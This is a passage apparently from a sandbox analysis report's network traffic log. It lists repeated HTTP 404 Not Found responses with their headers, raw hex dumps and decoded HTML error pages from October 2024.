7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Mon, 07 Oct 2024 08:38:47 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 08:38:54 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 08:38:56 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 08:38:56 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 08:38:56 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 08:38:59 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 08:39:02 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 07 Oct 2024 08:39:09 GMTserver: LiteSpeedplatform: hostingerstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-xss-protection: 1; mode=blockx-content-type-options: nosniffvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, i
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 07 Oct 2024 08:39:12 GMTserver: LiteSpeedplatform: hostingerstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-xss-protection: 1; mode=blockx-content-type-options: nosniffvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, i
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 07 Oct 2024 08:39:15 GMTserver: LiteSpeedplatform: hostingerstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-xss-protection: 1; mode=blockx-content-type-options: nosniffvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 